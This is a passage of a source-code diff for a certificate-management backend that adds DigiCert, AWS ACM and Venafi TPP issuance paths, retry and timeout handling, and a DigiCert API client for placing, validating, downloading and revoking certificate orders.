export type TIssueCertificateFromProfileJobData = { certificateId: string; profileId: string; caId: string; + caType?: CaType; commonName?: string; altNames?: Array<{ type: string; value: string }>; ttl: string; @@ -104,13 +121,15 @@ type TCertificateIssuanceQueueFactoryDep = { pkiSubscriberDAL: Pick; pkiSyncDAL: Pick; pkiSyncQueue: Pick; - certificateProfileDAL?: Pick; + certificateProfileDAL?: Pick; certificateRequestService?: Pick< 
TCertificateRequestServiceFactory, "attachCertificateToRequest" | "updateCertificateRequestStatus" >; + certificateRequestDAL?: Pick; resourceMetadataDAL: Pick; pkiAlertV2Queue?: Pick; + gatewayV2Service: Pick; }; export type TCertificateIssuanceQueueFactory = ReturnType; @@ -131,8 +150,10 @@ export const certificateIssuanceQueueFactory = ({ pkiSyncQueue, certificateProfileDAL, certificateRequestService, + certificateRequestDAL, resourceMetadataDAL, - pkiAlertV2Queue + pkiAlertV2Queue, + gatewayV2Service }: TCertificateIssuanceQueueFactoryDep) => { const acmeFns = AcmeCertificateAuthorityFns({ appConnectionDAL, @@ -179,6 +200,45 @@ export const certificateIssuanceQueueFactory = ({ certificateProfileDAL }); + const digicertFns = DigiCertCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL + }); + + const awsAcmPublicCaFns = AwsAcmPublicCaCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL + }); + + const venafiTppFns = VenafiTppCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL, + gatewayV2Service + }); + /** * Queue a certificate issuance job. 
*/ @@ -186,6 +246,7 @@ export const certificateIssuanceQueueFactory = ({ certificateId, profileId, caId, + caType, commonName, altNames, ttl, @@ -207,6 +268,7 @@ export const certificateIssuanceQueueFactory = ({ certificateId, profileId, caId, + caType, commonName, altNames, ttl, @@ -225,13 +287,16 @@ export const certificateIssuanceQueueFactory = ({ locality }; + // ACM DNS validation can take 5–30 minutes; the function is fully idempotent via + // IdempotencyToken, so we poll longer with a fixed backoff instead of exponential. + const queueOpts = + caType === CaType.AWS_ACM_PUBLIC_CA + ? { attempts: 30, backoff: { type: "fixed" as const, delay: 60000 } } + : { attempts: 3, backoff: { type: "exponential" as const, delay: 5000 } }; + await queueService.queue(QueueName.CertificateIssuance, QueueJobs.CaIssueCertificateFromProfile, jobData, { jobId: `certificate-issuance-${certificateId}`, - attempts: 3, - backoff: { - type: "exponential", - delay: 5000 - } + ...queueOpts }); }; @@ -295,21 +360,35 @@ export const certificateIssuanceQueueFactory = ({ certificateCsr = generatedCsr.toString(); } - const acmeResult = await acmeFns.orderCertificateFromProfile({ - caId, - profileId, - commonName: commonName || "", - altNames: altNames?.map((san) => san.value) || [], - csr: Buffer.from(certificateCsr), - csrPrivateKey: skLeaf, - keyUsages: keyUsages as CertKeyUsage[], - extendedKeyUsages: extendedKeyUsages as CertExtendedKeyUsage[], - ttl, - signatureAlgorithm, - keyAlgorithm, - isRenewal, - originalCertificateId - }); + let acmeResult; + try { + acmeResult = await runWithAcmeOrderTimeout( + (signal) => + acmeFns.orderCertificateFromProfile({ + caId, + profileId, + commonName: commonName || "", + altNames: altNames?.map((san) => san.value) || [], + csr: Buffer.from(certificateCsr), + csrPrivateKey: skLeaf, + keyUsages: keyUsages as CertKeyUsage[], + extendedKeyUsages: extendedKeyUsages as CertExtendedKeyUsage[], + ttl, + signatureAlgorithm, + keyAlgorithm, + isRenewal, + 
originalCertificateId, + abortSignal: signal + }), + ACME_ORDER_TIMEOUT_MS + ); + } catch (acmeError) { + if (isAcmeRateLimitError(acmeError)) { + const message = acmeError instanceof Error ? acmeError.message : String(acmeError); + throw new AcmeRateLimitError(`ACME CA rate-limited the order: ${message}`); + } + throw acmeError; + } if (certificateRequestId && certificateRequestService && acmeResult?.id) { try { @@ -396,6 +475,62 @@ export const certificateIssuanceQueueFactory = ({ certificateId: azureResult.certificateId }); + logger.info(`Certificate attached to request [certificateRequestId=${certificateRequestId}]`); + } catch (attachError) { + logger.error( + attachError, + `Failed to attach certificate to request [certificateRequestId=${certificateRequestId}]` + ); + try { + await certificateRequestService.updateCertificateRequestStatus({ + certificateRequestId, + status: CertificateRequestStatus.FAILED, + errorMessage: `Failed to attach certificate: ${attachError instanceof Error ? 
attachError.message : String(attachError)}` + }); + } catch (statusUpdateError) { + logger.error( + statusUpdateError, + `Failed to update certificate request status [certificateRequestId=${certificateRequestId}]` + ); + } + } + } + } else if (ca.externalCa?.type === CaType.AWS_ACM_PUBLIC_CA) { + const acmParams = { + caId, + profileId, + certificateId, + commonName: commonName || "", + altNames: (altNames || []) as Array<{ type: CertSubjectAlternativeNameType; value: string }>, + keyUsages, + extendedKeyUsages, + validity: { ttl }, + signatureAlgorithm, + keyAlgorithm: keyAlgorithm as CertKeyAlgorithm, + isRenewal, + originalCertificateId, + ...(csr && { csr }), + organization, + organizationalUnit, + country, + state, + locality + }; + + const acmResult = await awsAcmPublicCaFns.orderCertificateFromProfile(acmParams); + + if (certificateRequestId && certificateRequestService && acmResult?.certificateId) { + try { + await certificateRequestService.attachCertificateToRequest({ + certificateRequestId, + certificateId: acmResult.certificateId + }); + + await copyMetadataFromRequestToCertificate(resourceMetadataDAL, { + certificateRequestId, + certificateId: acmResult.certificateId + }); + logger.info(`Certificate attached to request [certificateRequestId=${certificateRequestId}]`); } catch (attachError) { logger.error( @@ -451,6 +586,164 @@ export const certificateIssuanceQueueFactory = ({ certificateId: awsPcaResult.certificateId }); + logger.info(`Certificate attached to request [certificateRequestId=${certificateRequestId}]`); + } catch (attachError) { + logger.error( + attachError, + `Failed to attach certificate to request [certificateRequestId=${certificateRequestId}]` + ); + try { + await certificateRequestService.updateCertificateRequestStatus({ + certificateRequestId, + status: CertificateRequestStatus.FAILED, + errorMessage: `Failed to attach certificate: ${attachError instanceof Error ? 
attachError.message : String(attachError)}` + }); + } catch (statusUpdateError) { + logger.error( + statusUpdateError, + `Failed to update certificate request status [certificateRequestId=${certificateRequestId}]` + ); + } + } + } + } else if (ca.externalCa?.type === CaType.DIGICERT) { + if (!certificateRequestId || !certificateRequestDAL) { + throw new NotFoundError({ + message: "DigiCert issuance requires a certificate request and request DAL" + }); + } + + let renewalOfOrderId: number | undefined; + if (isRenewal && originalCertificateId) { + const originalCert = await certificateDAL.findById(originalCertificateId); + const parsedMetadata = DigiCertExternalMetadataSchema.safeParse(originalCert?.externalMetadata); + if (parsedMetadata.success) { + renewalOfOrderId = parsedMetadata.data.orderId; + } else { + logger.warn( + `DigiCert renewal requested but previous certificate has no DigiCert order reference in externalMetadata β€” falling back to a new order [originalCertificateId=${originalCertificateId}]` + ); + } + } + + const digicertResult = await digicertFns.orderCertificateFromProfile({ + caId, + commonName: commonName || "", + altNames: altNames?.map((san) => san.value) || [], + signatureAlgorithm, + keyAlgorithm: keyAlgorithm as CertKeyAlgorithm, + ttl, + ...(csr && { csr }), + ...(renewalOfOrderId !== undefined && { renewalOfOrderId }) + }); + + let encryptedPrivateKey: Buffer | undefined; + if (digicertResult.privateKey) { + const certificateManagerKmsId = await getProjectKmsCertificateKeyId({ + projectId: ca.projectId, + projectDAL, + kmsService + }); + const kmsEncryptor = await kmsService.encryptWithKmsKey({ kmsId: certificateManagerKmsId }); + const { cipherTextBlob } = await kmsEncryptor({ plainText: Buffer.from(digicertResult.privateKey) }); + encryptedPrivateKey = cipherTextBlob; + } + + const metadataWithRenewal = { + ...digicertResult.metadata, + digicert: { + ...digicertResult.metadata.digicert, + ...(isRenewal && originalCertificateId ? 
{ isRenewal: true, originalCertificateId } : {}) + } + }; + + await certificateRequestDAL.updateById(certificateRequestId, { + status: CertificateRequestStatus.PENDING_VALIDATION, + metadata: JSON.stringify(metadataWithRenewal), + ...(encryptedPrivateKey && { encryptedPrivateKey }) + }); + + if (digicertResult.immediateCertificateId) { + try { + const { certificateId: attachedCertificateId } = await digicertFns.fetchAndAttachIssuedCertificate({ + caId, + certificateRequest: { + id: certificateRequestId, + profileId, + commonName: commonName || "", + altNames: altNames?.map((san) => san.value).join(",") ?? null, + keyUsages: keyUsages ?? null, + extendedKeyUsages: extendedKeyUsages ?? null, + keyAlgorithm, + signatureAlgorithm + }, + digicertCertificateId: digicertResult.immediateCertificateId, + digicertOrderId: digicertResult.orderId, + encryptedPrivateKey, + isRenewal, + originalCertificateId + }); + + if (certificateRequestService) { + await certificateRequestService.attachCertificateToRequest({ + certificateRequestId, + certificateId: attachedCertificateId + }); + await copyMetadataFromRequestToCertificate(resourceMetadataDAL, { + certificateRequestId, + certificateId: attachedCertificateId + }); + } + + logger.info( + `DigiCert order issued immediately (pre-validated domains), attached certificate [certificateRequestId=${certificateRequestId}] [certificateId=${attachedCertificateId}]` + ); + } catch (finaliseError) { + logger.error( + finaliseError, + `DigiCert immediate finalisation failed, will be retried by polling queue [certificateRequestId=${certificateRequestId}]` + ); + } + } else { + logger.info( + `DigiCert order placed, awaiting validation [certificateRequestId=${certificateRequestId}] [orderId=${digicertResult.metadata.digicert.orderId}]` + ); + } + } else if (ca.externalCa?.type === CaType.VENAFI_TPP) { + const venafiTppParams = { + caId, + profileId, + commonName: commonName || "", + altNames: (altNames || []) as Array<{ type: 
CertSubjectAlternativeNameType; value: string }>, + keyUsages: keyUsages as CertKeyUsage[], + extendedKeyUsages: extendedKeyUsages as CertExtendedKeyUsage[], + validity: { ttl }, + signatureAlgorithm, + keyAlgorithm: keyAlgorithm as CertKeyAlgorithm, + isRenewal, + originalCertificateId, + ...(csr && { csr }), + organization, + organizationalUnit, + country, + state, + locality + }; + + const venafiTppResult = await venafiTppFns.orderCertificateFromProfile(venafiTppParams); + + if (certificateRequestId && certificateRequestService && venafiTppResult?.certificateId) { + try { + await certificateRequestService.attachCertificateToRequest({ + certificateRequestId, + certificateId: venafiTppResult.certificateId + }); + + await copyMetadataFromRequestToCertificate(resourceMetadataDAL, { + certificateRequestId, + certificateId: venafiTppResult.certificateId + }); + logger.info(`Certificate attached to request [certificateRequestId=${certificateRequestId}]`); } catch (attachError) { logger.error( @@ -487,14 +780,27 @@ export const certificateIssuanceQueueFactory = ({ logger.debug("Failed to queue PKI alert event for async certificate issuance"); } } catch (error: unknown) { + // AcmPendingError signals that an ACM operation (DNS validation, renewal, export) is still + // in flight. Don't mark the request as FAILED on every poll β€” only after the queue exhausts attempts. + const isRetryable = error instanceof AcmPendingError; + if (isRetryable) { + logger.info( + `Certificate issuance pending ACM operation β€” will retry [certificateId=${certificateId}] [caId=${caId}]` + ); + throw error; + } + logger.error(error, `Certificate issuance job failed for [certificateId=${certificateId}] [caId=${caId}]`); + const isAcmeTerminal = error instanceof AcmeOrderTimeoutError || error instanceof AcmeRateLimitError; + if (certificateRequestId && certificateRequestService) { try { + const errorMessage = error instanceof Error ? 
error.message : String(error); await certificateRequestService.updateCertificateRequestStatus({ certificateRequestId, status: CertificateRequestStatus.FAILED, - errorMessage: `Certificate issuance failed: ${error instanceof Error ? error.message : String(error)}` + errorMessage: isAcmeTerminal ? errorMessage : `Certificate issuance failed: ${errorMessage}` }); logger.info(`Updated certificate request ${certificateRequestId} status to failed due to issuance error`); } catch (statusUpdateError) { @@ -505,12 +811,52 @@ export const certificateIssuanceQueueFactory = ({ } } + // For ACM's 30-attempt queue, wrap non-retryable errors so BullMQ stops retrying immediately. + // Other CAs keep default retry behavior (3 attempts is short enough that running through them is fine). + if (data.caType === CaType.AWS_ACM_PUBLIC_CA || isAcmeTerminal) { + const message = error instanceof Error ? error.message : String(error); + const wrapped = new UnrecoverableError(message); + (wrapped as Error).cause = error; + throw wrapped; + } + throw error; } }; queueService.start(QueueName.CertificateIssuance, async (job) => { - await processCertificateIssuanceJobs(job.data); + try { + await processCertificateIssuanceJobs(job.data); + } catch (error) { + // AcmPendingError is rethrown on every retry so BullMQ keeps polling; the in-handler + // FAILED-update branch never runs for it. On the final attempt we still need to flip the request + // row to FAILED ourselves β€” BullMQ will move the job to the failed state but has no hook to + // update our DB, and no queue-level "failed" listener is wired for CertificateIssuance. + if (error instanceof AcmPendingError) { + const attemptsMade = job.attemptsMade ?? 0; + const maxAttempts = job.opts?.attempts ?? 
1; + const isFinalAttempt = attemptsMade + 1 >= maxAttempts; + const { certificateRequestId, certificateId, caId } = job.data; + if (isFinalAttempt && certificateRequestId && certificateRequestService) { + try { + await certificateRequestService.updateCertificateRequestStatus({ + certificateRequestId, + status: CertificateRequestStatus.FAILED, + errorMessage: `AWS ACM DNS validation did not complete after ${maxAttempts} attempts: ${error.message}` + }); + logger.info( + `Marked certificate request FAILED after exhausted ACM validation retries [certificateRequestId=${certificateRequestId}] [certificateId=${certificateId}] [caId=${caId}]` + ); + } catch (updateError) { + logger.error( + updateError, + `Failed to mark certificate request FAILED after exhausted ACM retries [certificateRequestId=${certificateRequestId}]` + ); + } + } + } + throw error; + } }); return { diff --git a/backend/src/services/certificate-authority/digicert/digicert-api-client.ts b/backend/src/services/certificate-authority/digicert/digicert-api-client.ts new file mode 100644 index 00000000000..c765f182d3c --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-api-client.ts @@ -0,0 +1,125 @@ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { DIGICERT_AUTH_HEADER } from "@app/services/app-connection/digicert/digicert-connection-constants"; +import { extractDigiCertErrorMessage } from "@app/services/app-connection/digicert/digicert-connection-errors"; + +type TPlaceOrderRequest = { + certificate: { + common_name: string; + dns_names?: string[]; + csr: string; + signature_hash?: string; + }; + organization: { id: number }; + + order_validity: { days: number } | { years: number }; + dcv_method: "dns-txt-token"; + skip_approval?: boolean; + renewal_of_order_id?: number; +}; + +type TDigiCertDcvToken = { + token: string; + status?: string; + expiration_date?: string; +}; + 
+type TPlaceOrderResponse = {
+  id: number;
+  certificate_id?: number;
+  dcv_random_value?: string;
+  domains: {
+    id: number;
+    dns_name: string;
+    dcv_token?: TDigiCertDcvToken;
+  }[];
+};
+
+type TOrderResponse = {
+  id: number;
+  status: string;
+  certificate?: {
+    id: number;
+  };
+  dcv_method?: string;
+};
+
+type TCheckValidationResponse = {
+  order_status?: string;
+  certificate_id?: number;
+  dcv_status?: string;
+  dns_name_validations?: {
+    dns_name: string;
+    status: string;
+  }[];
+};
+
+export type TDigiCertApiClient = ReturnType<typeof createDigiCertApiClient>;
+
+export const createDigiCertApiClient = (apiKey: string, baseURL: string) => {
+  const headers = {
+    [DIGICERT_AUTH_HEADER]: apiKey,
+    "Content-Type": "application/json"
+  };
+
+  const wrap = <T>(fn: () => Promise<T>, action: string) =>
+    fn().catch((error: unknown) => {
+      if (error instanceof AxiosError) {
+        throw new BadRequestError({
+          message: `DigiCert ${action} failed: ${extractDigiCertErrorMessage(error)}`
+        });
+      }
+      throw error;
+    });
+
+  const placeOrder = async (productSlug: string, body: TPlaceOrderRequest) =>
+    wrap(async () => {
+      const { data } = await request.post<TPlaceOrderResponse>(`${baseURL}/order/certificate/${productSlug}`, body, {
+        headers
+      });
+      return data;
+    }, `order placement for product ${productSlug}`);
+
+  const getOrder = async (orderId: number) =>
+    wrap(async () => {
+      const { data } = await request.get<TOrderResponse>(`${baseURL}/order/certificate/${orderId}`, {
+        headers
+      });
+      return data;
+    }, `order lookup for ${orderId}`);
+
+  const checkValidation = async (orderId: number) =>
+    wrap(async () => {
+      const { data } = await request.put<TCheckValidationResponse>(
+        `${baseURL}/order/certificate/${orderId}/check-dcv`,
+        null,
+        { headers }
+      );
+      return data;
+    }, `validation check for order ${orderId}`);
+
+  const downloadCertificatePem = async (certificateId: number) =>
+    wrap(async () => {
+      const { data } = await request.get<string>(`${baseURL}/certificate/${certificateId}/download/format/pem_all`, {
+        headers,
+        responseType: "text",
+        transformResponse: 
(res: string) => res + }); + return data; + }, `certificate download for ${certificateId}`); + + const revokeOrder = async (orderId: number, comments: string) => + wrap(async () => { + await request.put(`${baseURL}/order/certificate/${orderId}/revoke`, { comments }, { headers }); + }, `order revocation for ${orderId}`); + + return { + placeOrder, + getOrder, + checkValidation, + downloadCertificatePem, + revokeOrder + }; +}; diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-enums.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-enums.ts new file mode 100644 index 00000000000..e872ea5fb02 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-enums.ts @@ -0,0 +1,15 @@ +export enum DigiCertOrderStatus { + Pending = "pending", + Approved = "approved", + Issued = "issued", + Revoked = "revoked", + Canceled = "canceled", + Rejected = "rejected", + Expired = "expired" +} + +export const DIGICERT_FINAL_ISSUED_STATUSES = [DigiCertOrderStatus.Issued] as const; + +export enum DigiCertProcessorOutcome { + Skipped = "skipped" +} diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-fns.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-fns.ts new file mode 100644 index 00000000000..bb5e1e004e9 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-fns.ts @@ -0,0 +1,726 @@ +/* eslint-disable no-await-in-loop */ +import * as x509 from "@peculiar/x509"; +import RE2 from "re2"; + +import { TableName } from "@app/db/schemas"; +import { crypto } from "@app/lib/crypto/cryptography"; +import { BadRequestError, NotFoundError } from "@app/lib/errors"; +import { ProcessedPermissionRules } from "@app/lib/knex/permission-filter-utils"; +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; 
+import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { decryptAppConnectionCredentials } from "@app/services/app-connection/app-connection-fns"; +import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service"; +import { getDigiCertApiBaseUrl } from "@app/services/app-connection/digicert/digicert-connection-fns"; +import { TDigiCertConnection } from "@app/services/app-connection/digicert/digicert-connection-types"; +import { TCertificateBodyDALFactory } from "@app/services/certificate/certificate-body-dal"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; +import { TCertificateSecretDALFactory } from "@app/services/certificate/certificate-secret-dal"; +import { + CertExtendedKeyUsage, + CertExtendedKeyUsageOIDToName, + CertKeyAlgorithm, + CertKeyUsage, + CertStatus, + CrlReason, + TAltNameType +} from "@app/services/certificate/certificate-types"; +import { + DigiCertExternalMetadataSchema, + TDigiCertExternalMetadata +} from "@app/services/certificate-common/external-metadata-schemas"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; +import { TProjectDALFactory } from "@app/services/project/project-dal"; +import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns"; + +import { TCertificateAuthorityDALFactory } from "../certificate-authority-dal"; +import { CaStatus, CaType } from "../certificate-authority-enums"; +import { keyAlgorithmToAlgCfg, parseDistinguishedName } from "../certificate-authority-fns"; +import { TExternalCertificateAuthorityDALFactory } from "../external-certificate-authority-dal"; +import { createDigiCertApiClient } from "./digicert-api-client"; +import { + TCreateDigiCertCertificateAuthorityDTO, + TDigiCertCertificateAuthority, + TDigiCertCertificateRequestMetadata, + 
TUpdateDigiCertCertificateAuthorityDTO +} from "./digicert-certificate-authority-types"; + +type TDigiCertCertificateAuthorityFnsDeps = { + appConnectionDAL: Pick; + appConnectionService: Pick; + certificateAuthorityDAL: Pick< + TCertificateAuthorityDALFactory, + "create" | "transaction" | "findByIdWithAssociatedCa" | "updateById" | "findWithAssociatedCa" | "findById" + >; + externalCertificateAuthorityDAL: Pick; + certificateDAL: Pick; + certificateBodyDAL: Pick; + certificateSecretDAL: Pick; + kmsService: Pick< + TKmsServiceFactory, + "encryptWithKmsKey" | "generateKmsKey" | "createCipherPairWithDataKey" | "decryptWithKmsKey" + >; + projectDAL: Pick; +}; + +export const castDbEntryToDigiCertCertificateAuthority = ( + ca: Awaited> +): TDigiCertCertificateAuthority & { credentials: Buffer | null | undefined } => { + if (!ca.externalCa?.id) { + throw new BadRequestError({ message: "Malformed DigiCert certificate authority" }); + } + + if (!ca.externalCa.appConnectionId) { + throw new BadRequestError({ + message: "DigiCert app connection ID is missing from certificate authority configuration" + }); + } + + const config = (ca.externalCa.configuration ?? 
{}) as { + organizationId?: number; + productNameId?: string; + }; + + if (typeof config.organizationId !== "number" || !config.productNameId) { + throw new BadRequestError({ + message: "DigiCert certificate authority configuration is missing organization ID or product" + }); + } + + return { + id: ca.id, + type: CaType.DIGICERT, + enableDirectIssuance: ca.enableDirectIssuance, + name: ca.name, + projectId: ca.projectId, + credentials: ca.externalCa.credentials, + configuration: { + appConnectionId: ca.externalCa.appConnectionId, + organizationId: config.organizationId, + productNameId: config.productNameId + }, + status: ca.status as CaStatus + }; +}; + +const getDigiCertClientCredentials = async ( + appConnectionId: string, + appConnectionDAL: Pick, + kmsService: Pick +): Promise<{ apiKey: string; baseUrl: string }> => { + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + throw new NotFoundError({ message: `DigiCert app connection with ID '${appConnectionId}' not found` }); + } + if (appConnection.app !== AppConnection.DigiCert) { + throw new BadRequestError({ message: `App connection with ID '${appConnectionId}' is not a DigiCert connection` }); + } + + const credentials = (await decryptAppConnectionCredentials({ + orgId: appConnection.orgId, + projectId: appConnection.projectId, + encryptedCredentials: appConnection.encryptedCredentials, + kmsService + })) as TDigiCertConnection["credentials"]; + + return { + apiKey: credentials.apiKey, + baseUrl: getDigiCertApiBaseUrl(credentials.region) + }; +}; + +const PEM_CERTIFICATE_RE2 = new RE2("-----BEGIN CERTIFICATE-----[\\s\\S]*?-----END CERTIFICATE-----", "g"); + +const TTL_RE2 = new RE2("^(\\d+)([dhm])$"); +const parseTtlToDays = (ttl: string): number => { + const match = ttl.match(TTL_RE2); + if (!match) { + throw new BadRequestError({ message: `Invalid TTL format: ${ttl}` }); + } + const [, value, unit] = match; + const num = Number.parseInt(value, 10); + if 
(!Number.isFinite(num) || num <= 0) { + throw new BadRequestError({ message: `Invalid TTL value: ${ttl}` }); + } + switch (unit) { + case "d": + return num; + case "h": + return Math.max(1, Math.ceil(num / 24)); + case "m": + return Math.max(1, Math.ceil(num / (24 * 60))); + default: + throw new BadRequestError({ message: `Invalid TTL unit: ${unit}` }); + } +}; + +const extractIssuedCertificateFields = (certObj: x509.X509Certificate) => { + const subject = parseDistinguishedName(certObj.subject); + const commonName = subject.commonName ?? ""; + + const sanExt = certObj.getExtension("2.5.29.17"); + const altNames: string[] = []; + if (sanExt) { + const sanNames = new x509.GeneralNames(sanExt.value); + for (const item of sanNames.items) { + if ( + item.type === TAltNameType.DNS || + item.type === TAltNameType.IP || + item.type === TAltNameType.EMAIL || + item.type === TAltNameType.URL + ) { + altNames.push(item.value); + } + } + } + + const keyUsages: CertKeyUsage[] = []; + const keyUsagesExt = certObj.getExtension(x509.KeyUsagesExtension); + if (keyUsagesExt) { + for (const keyUsage of Object.values(CertKeyUsage)) { + // eslint-disable-next-line no-bitwise + if ((x509.KeyUsageFlags[keyUsage] & keyUsagesExt.usages) !== 0) { + keyUsages.push(keyUsage); + } + } + } + + const extendedKeyUsages: CertExtendedKeyUsage[] = []; + const ekuExt = certObj.getExtension(x509.ExtendedKeyUsageExtension); + if (ekuExt) { + for (const oid of ekuExt.usages) { + const mapped = CertExtendedKeyUsageOIDToName[oid as string]; + if (mapped) extendedKeyUsages.push(mapped); + } + } + + return { commonName, altNames, keyUsages, extendedKeyUsages }; +}; + +const extractLeafAndChain = (pemBundle: string): { leaf: string; chain: string } => { + const matches = pemBundle.match(PEM_CERTIFICATE_RE2); + if (!matches || matches.length === 0) { + throw new BadRequestError({ message: "DigiCert returned an empty certificate bundle" }); + } + + if (matches.length < 2) { + throw new BadRequestError({ + 
message: `DigiCert returned an incomplete certificate bundle (${matches.length} entry, expected leaf + chain)` + }); + } + + let leafIndex = -1; + matches.forEach((pem, index) => { + if (leafIndex !== -1) return; + try { + const cert = new x509.X509Certificate(pem); + const basicConstraints = cert.getExtension(x509.BasicConstraintsExtension); + if (!basicConstraints?.ca) leafIndex = index; + } catch { + // skip unparseable entries + } + }); + + if (leafIndex === -1) leafIndex = 0; + + const leaf = matches[leafIndex].trim(); + const chain = matches + .filter((_, index) => index !== leafIndex) + .map((cert) => cert.trim()) + .join("\n"); + return { leaf, chain }; +}; + +export const DigiCertCertificateAuthorityFns = ({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL +}: TDigiCertCertificateAuthorityFnsDeps) => { + const createCertificateAuthority = async ({ + name, + projectId, + configuration, + actor, + status + }: { + status: CaStatus; + name: string; + projectId: string; + configuration: TCreateDigiCertCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + }) => { + const { appConnectionId, organizationId, productNameId } = configuration; + + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + throw new NotFoundError({ message: `DigiCert app connection with ID '${appConnectionId}' not found` }); + } + if (appConnection.app !== AppConnection.DigiCert) { + throw new BadRequestError({ + message: `App connection with ID '${appConnectionId}' is not a DigiCert connection` + }); + } + + await appConnectionService.validateAppConnectionUsageById( + appConnection.app as AppConnection, + { connectionId: appConnectionId, projectId }, + actor + ); + + const caEntity = await certificateAuthorityDAL.transaction(async (tx) => { + try { + const ca = await 
certificateAuthorityDAL.create( + { + projectId, + enableDirectIssuance: false, + name, + status + }, + tx + ); + + await externalCertificateAuthorityDAL.create( + { + caId: ca.id, + appConnectionId, + type: CaType.DIGICERT, + configuration: { + organizationId, + productNameId + } + }, + tx + ); + + return await certificateAuthorityDAL.findByIdWithAssociatedCa(ca.id, tx); + } catch (error) { + // 23505 = unique_violation β€” same CA name in the same project + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access, @typescript-eslint/no-explicit-any + if ((error as any)?.error?.code === "23505") { + throw new BadRequestError({ + message: "Certificate authority with the same name already exists in your project" + }); + } + throw error; + } + }); + + if (!caEntity.externalCa?.id) { + throw new BadRequestError({ message: "Failed to create external certificate authority" }); + } + + return castDbEntryToDigiCertCertificateAuthority(caEntity); + }; + + const updateCertificateAuthority = async ({ + id, + status, + configuration, + actor, + name + }: { + id: string; + status?: CaStatus; + configuration?: TUpdateDigiCertCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + name?: string; + }) => { + const updatedCa = await certificateAuthorityDAL.transaction(async (tx) => { + if (configuration) { + const { appConnectionId, organizationId, productNameId } = configuration; + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + throw new NotFoundError({ message: `DigiCert app connection with ID '${appConnectionId}' not found` }); + } + if (appConnection.app !== AppConnection.DigiCert) { + throw new BadRequestError({ + message: `App connection with ID '${appConnectionId}' is not a DigiCert connection` + }); + } + + const ca = await certificateAuthorityDAL.findById(id); + if (!ca) { + throw new NotFoundError({ message: `Could not find Certificate Authority with ID "${id}"` }); + } + + await 
appConnectionService.validateAppConnectionUsageById( + appConnection.app as AppConnection, + { connectionId: appConnectionId, projectId: ca.projectId }, + actor + ); + + await externalCertificateAuthorityDAL.update( + { + caId: id, + type: CaType.DIGICERT + }, + { + appConnectionId, + configuration: { + organizationId, + productNameId + } + }, + tx + ); + } + + if (name || status) { + await certificateAuthorityDAL.updateById(id, { name, status }, tx); + } + + return certificateAuthorityDAL.findByIdWithAssociatedCa(id, tx); + }); + + if (!updatedCa.externalCa?.id) { + throw new BadRequestError({ message: "Failed to update external certificate authority" }); + } + + return castDbEntryToDigiCertCertificateAuthority(updatedCa); + }; + + const listCertificateAuthorities = async ({ + projectId, + permissionFilters + }: { + projectId: string; + permissionFilters?: ProcessedPermissionRules; + }) => { + const cas = await certificateAuthorityDAL.findWithAssociatedCa( + { + [`${TableName.CertificateAuthority}.projectId` as "projectId"]: projectId, + [`${TableName.ExternalCertificateAuthority}.type` as "type"]: CaType.DIGICERT + }, + {}, + permissionFilters + ); + + return cas.map(castDbEntryToDigiCertCertificateAuthority); + }; + + const orderCertificateFromProfile = async ({ + caId, + commonName, + altNames = [], + signatureAlgorithm, + keyAlgorithm = CertKeyAlgorithm.RSA_2048, + csr, + ttl, + renewalOfOrderId + }: { + caId: string; + commonName: string; + altNames?: string[]; + signatureAlgorithm?: string; + keyAlgorithm?: CertKeyAlgorithm; + csr?: string; + ttl: string; + renewalOfOrderId?: number; + }): Promise<{ + metadata: TDigiCertCertificateRequestMetadata; + privateKey: string; + immediateCertificateId?: number; + orderId: number; + }> => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.DIGICERT) { + throw new BadRequestError({ message: "CA is not a DigiCert certificate authority" }); + 
